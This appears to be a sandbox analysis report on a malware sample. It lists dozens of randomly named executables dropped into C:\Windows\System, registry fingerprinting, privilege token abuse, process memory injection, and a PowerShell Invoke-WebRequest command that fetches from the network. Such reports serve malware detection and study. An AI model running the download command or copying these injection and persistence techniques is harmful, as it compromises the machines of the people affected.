File created C:\Windows\System\LIUouoF.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\bnJKKOV.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\PPJYDCP.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ZBgTJYH.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ZZSyuOt.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\udNCrmU.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\FEmsBsL.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\AdmeTlP.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\uVVHSnU.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\wQItDGi.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\dxcGHZV.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\OoNLgGq.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\oXAFzME.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\NxTRxkk.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ptZQIZB.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\EpfSWce.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\gjyTpKH.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\qTYKTgh.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\otLwJoD.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\wImgzFY.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\HUYddEX.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\qKvowYU.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\JGOetmA.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\MdLMsIt.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\jlrZWhh.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\UCgfmBP.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\nNMJbPL.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\yFtinJH.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ZBgBvXl.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\eKmfKOk.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\OHAJwHE.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\jnMPCyo.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\uGzvaiT.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\MOXjARc.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\NdPLcXy.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\NvJHLCd.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\hnjCcbt.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\nvnrbKg.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\UMEPmow.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\nRMPSss.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\PFjKSlo.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\kxDxIwy.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\fCPkLDz.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\gAumOCR.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\OOcKAGe.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\vZLsyrY.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\pxNGDoe.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\KByXiNf.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\KWXegSx.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\GlWPMOT.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\IgNhACD.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\AhnSDhc.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\wQYCTdy.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\FmQFaUW.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\HmydSUV.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\mGJKRHG.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\LnAdyZQ.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\MreGzPR.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\buBFHqF.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\BIpgMBy.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\system32\wermgr.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\system32\wermgr.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\wermgr.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\system32\wermgr.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\system32\wermgr.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 704 wrote to memory of 1768 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 704 wrote to memory of 1768 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 704 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\JonCuBu.exe
PID 704 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\JonCuBu.exe
PID 704 wrote to memory of 3860 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\kEdJmrz.exe
PID 704 wrote to memory of 3860 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\kEdJmrz.exe
PID 704 wrote to memory of 3704 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\xqSyGQj.exe
PID 704 wrote to memory of 3704 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\xqSyGQj.exe
PID 704 wrote to memory of 2768 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\KtqLifu.exe
PID 704 wrote to memory of 2768 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\KtqLifu.exe
PID 704 wrote to memory of 4296 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\LDRXizl.exe
PID 704 wrote to memory of 4296 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\LDRXizl.exe
PID 704 wrote to memory of 4600 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\LoHxNOo.exe
PID 704 wrote to memory of 4600 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\LoHxNOo.exe
PID 704 wrote to memory of 2960 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\NuFbkdj.exe
PID 704 wrote to memory of 2960 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\NuFbkdj.exe
PID 704 wrote to memory of 2104 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\FEmsBsL.exe
PID 704 wrote to memory of 2104 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\FEmsBsL.exe
PID 704 wrote to memory of 4920 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\ZDsCOXL.exe
PID 704 wrote to memory of 4920 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\ZDsCOXL.exe
PID 704 wrote to memory of 4076 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\ynpOljO.exe
PID 704 wrote to memory of 4076 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\ynpOljO.exe
PID 704 wrote to memory of 4268 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\EhfFOdg.exe
PID 704 wrote to memory of 4268 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\EhfFOdg.exe
PID 704 wrote to memory of 4944 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\RrSttqY.exe
PID 704 wrote to memory of 4944 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\RrSttqY.exe
PID 704 wrote to memory of 848 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\wLWpVln.exe
PID 704 wrote to memory of 848 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\wLWpVln.exe
PID 704 wrote to memory of 3512 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\yFtinJH.exe
PID 704 wrote to memory of 3512 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\yFtinJH.exe
PID 704 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\qFChzUW.exe
PID 704 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\qFChzUW.exe
PID 704 wrote to memory of 4760 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\VxLvzkE.exe
PID 704 wrote to memory of 4760 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\VxLvzkE.exe
PID 704 wrote to memory of 5116 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\dKpzFBd.exe
PID 704 wrote to memory of 5116 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\dKpzFBd.exe
PID 704 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\VWjOqgN.exe
PID 704 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\VWjOqgN.exe
PID 704 wrote to memory of 1644 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\YpBmLIs.exe
PID 704 wrote to memory of 1644 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\YpBmLIs.exe
PID 704 wrote to memory of 4128 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\CKFXics.exe
PID 704 wrote to memory of 4128 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\CKFXics.exe
PID 704 wrote to memory of 4176 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\AKydYsX.exe
PID 704 wrote to memory of 4176 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\AKydYsX.exe
PID 704 wrote to memory of 964 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\qReMRCd.exe
PID 704 wrote to memory of 964 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\qReMRCd.exe
PID 704 wrote to memory of 4320 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\JTgpNHz.exe
PID 704 wrote to memory of 4320 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\JTgpNHz.exe
PID 704 wrote to memory of 3492 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\qfMDkGq.exe
PID 704 wrote to memory of 3492 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\qfMDkGq.exe
PID 704 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\zqniLXE.exe
PID 704 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\zqniLXE.exe
PID 704 wrote to memory of 3360 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\sMsCQDI.exe
PID 704 wrote to memory of 3360 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\sMsCQDI.exe
PID 704 wrote to memory of 4024 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\PtbeSAq.exe
PID 704 wrote to memory of 4024 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\PtbeSAq.exe
PID 704 wrote to memory of 4972 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\vdmURMq.exe
PID 704 wrote to memory of 4972 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\vdmURMq.exe
PID 704 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\TjTKNNk.exe
PID 704 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\TjTKNNk.exe
PID 704 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\qKvowYU.exe
PID 704 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\qKvowYU.exe
PID 704 wrote to memory of 220 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\NGlyvnw.exe
PID 704 wrote to memory of 220 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\NGlyvnw.exe

Processes

C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "

C:\Windows\System\JonCuBu.exe

C:\Windows\System\JonCuBu.exe

C:\Windows\System\kEdJmrz.exe

C:\Windows\System\kEdJmrz.exe

C:\Windows\System\xqSyGQj.exe

C:\Windows\System\xqSyGQj.exe

C:\Windows\System\KtqLifu.exe

C:\Windows\System\KtqLifu.exe

C:\Windows\System\LDRXizl.exe

C:\Windows\System\LDRXizl.exe

C:\Windows\System\LoHxNOo.exe

C:\Windows\System\LoHxNOo.exe

C:\Windows\System\NuFbkdj.exe

C:\Windows\System\NuFbkdj.exe

C:\Windows\System\FEmsBsL.exe

C:\Windows\System\FEmsBsL.exe

C:\Windows\System\ZDsCOXL.exe

C:\Windows\System\ZDsCOXL.exe

C:\Windows\System\ynpOljO.exe

C:\Windows\System\ynpOljO.exe

C:\Windows\System\EhfFOdg.exe

C:\Windows\System\EhfFOdg.exe

C:\Windows\System\RrSttqY.exe

C:\Windows\System\RrSttqY.exe

C:\Windows\System\wLWpVln.exe

C:\Windows\System\wLWpVln.exe

C:\Windows\System\yFtinJH.exe

C:\Windows\System\yFtinJH.exe

C:\Windows\System\qFChzUW.exe

C:\Windows\System\qFChzUW.exe

C:\Windows\System\VxLvzkE.exe

C:\Windows\System\VxLvzkE.exe

C:\Windows\System\dKpzFBd.exe

C:\Windows\System\dKpzFBd.exe

C:\Windows\System\VWjOqgN.exe

C:\Windows\System\VWjOqgN.exe

C:\Windows\System\YpBmLIs.exe

C:\Windows\System\YpBmLIs.exe

C:\Windows\System\CKFXics.exe

C:\Windows\System\CKFXics.exe

C:\Windows\System\AKydYsX.exe

C:\Windows\System\AKydYsX.exe

C:\Windows\System\qReMRCd.exe

C:\Windows\System\qReMRCd.exe

C:\Windows\System\JTgpNHz.exe

C:\Windows\System\JTgpNHz.exe

C:\Windows\System\qfMDkGq.exe

C:\Windows\System\qfMDkGq.exe

C:\Windows\System\zqniLXE.exe

C:\Windows\System\zqniLXE.exe

C:\Windows\System\sMsCQDI.exe

C:\Windows\System\sMsCQDI.exe

C:\Windows\System\PtbeSAq.exe

C:\Windows\System\PtbeSAq.exe

C:\Windows\System\vdmURMq.exe

C:\Windows\System\vdmURMq.exe

C:\Windows\System\TjTKNNk.exe

C:\Windows\System\TjTKNNk.exe

C:\Windows\System\qKvowYU.exe

C:\Windows\System\qKvowYU.exe

C:\Windows\System\NGlyvnw.exe

C:\Windows\System\NGlyvnw.exe

C:\Windows\System\ClSTZIj.exe

C:\Windows\System\ClSTZIj.exe

C:\Windows\System\QEqIusX.exe

C:\Windows\System\QEqIusX.exe

C:\Windows\System\HvwWRBQ.exe

C:\Windows\System\HvwWRBQ.exe

C:\Windows\System\bqaMhPx.exe

C:\Windows\System\bqaMhPx.exe

C:\Windows\System\feiuYiY.exe

C:\Windows\System\feiuYiY.exe

C:\Windows\System\FqqPbad.exe

C:\Windows\System\FqqPbad.exe

C:\Windows\System\WOUiFMI.exe

C:\Windows\System\WOUiFMI.exe

C:\Windows\System\VmVWIgJ.exe

C:\Windows\System\VmVWIgJ.exe

C:\Windows\System\YeRuNYA.exe

C:\Windows\System\YeRuNYA.exe

C:\Windows\System\dWRgnLQ.exe

C:\Windows\System\dWRgnLQ.exe

C:\Windows\System\yCvZUcT.exe

C:\Windows\System\yCvZUcT.exe

C:\Windows\System\qrOZrGe.exe

C:\Windows\System\qrOZrGe.exe

C:\Windows\System\RLuIGQY.exe

C:\Windows\System\RLuIGQY.exe

C:\Windows\System\JTzipdv.exe

C:\Windows\System\JTzipdv.exe

C:\Windows\System\vlYVSKV.exe

C:\Windows\System\vlYVSKV.exe

C:\Windows\System\UjFmbBi.exe

C:\Windows\System\UjFmbBi.exe

C:\Windows\System\tITsiay.exe

C:\Windows\System\tITsiay.exe

C:\Windows\System\EXFVTbL.exe

C:\Windows\System\EXFVTbL.exe

C:\Windows\System\FQCWSWz.exe

C:\Windows\System\FQCWSWz.exe

C:\Windows\System\NYOgzEc.exe

C:\Windows\System\NYOgzEc.exe

C:\Windows\System\cNpOHuL.exe

C:\Windows\System\cNpOHuL.exe

C:\Windows\System\xjVITeR.exe

C:\Windows\System\xjVITeR.exe

C:\Windows\System\xwTUvaW.exe

C:\Windows\System\xwTUvaW.exe

C:\Windows\System\sRbYeJk.exe

C:\Windows\System\sRbYeJk.exe

C:\Windows\System\jYsXcYH.exe

C:\Windows\System\jYsXcYH.exe

C:\Windows\System\LBBmCUy.exe

C:\Windows\System\LBBmCUy.exe

C:\Windows\System\GVISYya.exe

C:\Windows\System\GVISYya.exe

C:\Windows\System\HALLYrl.exe

C:\Windows\System\HALLYrl.exe

C:\Windows\System\qgwgpLg.exe

C:\Windows\System\qgwgpLg.exe

C:\Windows\System\qdoZNEl.exe

C:\Windows\System\qdoZNEl.exe

C:\Windows\System\NktYoMl.exe

C:\Windows\System\NktYoMl.exe

C:\Windows\System\vdAqlbE.exe

C:\Windows\System\vdAqlbE.exe

C:\Windows\System\VaEetJH.exe

C:\Windows\System\VaEetJH.exe

C:\Windows\System\YHLPKKn.exe

C:\Windows\System\YHLPKKn.exe

C:\Windows\System\SoFhSoU.exe

C:\Windows\System\SoFhSoU.exe

C:\Windows\System\jEUZJeq.exe

C:\Windows\System\jEUZJeq.exe

C:\Windows\System\NnaAPvX.exe

C:\Windows\System\NnaAPvX.exe

C:\Windows\System\NisVQNf.exe

C:\Windows\System\NisVQNf.exe

C:\Windows\System\entWbXj.exe

C:\Windows\System\entWbXj.exe

C:\Windows\System\UgdIkIw.exe

C:\Windows\System\UgdIkIw.exe

C:\Windows\System\fpAscte.exe

C:\Windows\System\fpAscte.exe

C:\Windows\System\KmoTRWQ.exe

C:\Windows\System\KmoTRWQ.exe

C:\Windows\System\MJgqqzc.exe

C:\Windows\System\MJgqqzc.exe

C:\Windows\System\LLvOFaY.exe

C:\Windows\System\LLvOFaY.exe

C:\Windows\System\UlbtrDS.exe

C:\Windows\System\UlbtrDS.exe

C:\Windows\System\almKFAZ.exe

C:\Windows\System\almKFAZ.exe

C:\Windows\System\RyOOXXJ.exe

C:\Windows\System\RyOOXXJ.exe

C:\Windows\System\BGbANum.exe

C:\Windows\System\BGbANum.exe

C:\Windows\System\KpJAjJn.exe

